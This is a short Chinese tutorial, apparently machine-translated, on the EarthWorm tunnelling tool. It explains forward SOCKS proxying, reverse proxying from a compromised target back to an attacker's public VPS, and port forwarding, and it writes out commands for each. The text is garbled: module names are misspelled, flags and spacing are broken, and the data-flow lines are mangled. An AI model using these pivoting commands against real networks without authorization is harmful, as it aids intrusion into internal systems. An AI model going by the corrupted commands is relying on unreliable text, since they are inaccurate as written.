一方面,简介EarthWorm是一个内部网贯通神器,具有三个功能的正向代理、反向代理、端口转发。
为了实现这些功能,EarthWorm构建了六个功能模块。 分别是ssocksd、rcsocks、rssocks、lcx_listen、lcx_tran和lcx_slave。
可以从三个功能的角度这样划分
功能名称
对应模块
正向代理
ssocksd
反向代理
rcsocks,rssocks
端口转发
lcx_listen,lcx_slave,lcx_tran
二、顺向代理一个命令即可
./ew-sssocksd---listen port 1080 or./ew-sssocksd-l 1080三、反向代理此处必须使用两个功能模块rcsosks,rssocks
在很多场景中,无法直接连接到需要充当代理的主机,如何解决这个问题呢? 虽然EarthWorm的解决方案非常简单,且考虑到无法直接连接到代理主机,但代理主机可以主动连接,因此必须等待该主机承担代理角色。 这就是rccosks、rssocks的指令设计理念。 rcsocks建立本地代理客户端,指定本地接收反弹的端口,rssocks建立本地代理服务,并在建立服务端后指定要主动连接的远程主机的IP和端口。
步骤1 :在公共网络VPS上执行以下命令:/ew _ for _ Linux 64-src socks-l 1080-e 1024此命令表示公共网络设备侦听1080和1024端口。 攻击者机器访问1080端口,并等待目标机器访问1024端口。
步骤2 :目标设备执行以下命令。/ew _ for _ win.exe-SRS socks-d120.XXX.XXX.xx-e 1024其中-d参数的值是刚才的公共IP
步骤3 )攻击者计算机通过proxychains或浏览器安装Socks5代理以访问目标内部网服务(4、端口转发此功能包括lcx_listen、lcx_slave、Socks5
典型的使用命令组合如下。
./ew-slcx _ listen-l 1080-e 8888./ew-slcx _ tran-l 1080-f [ conn IP ]-g 8888数据为local:1080-local33608888
实现用于将本地端口转发到可以远程直接连接的主机的端口。
./ew-slcx _ listen-l 1080-e 8888./ew-slcx _ slave-d [ ref _ IP ]-e 1080-f [ conn IP ]-g 1080数据为connIP33608880
可以有各种组合方式,根据需要进行总结。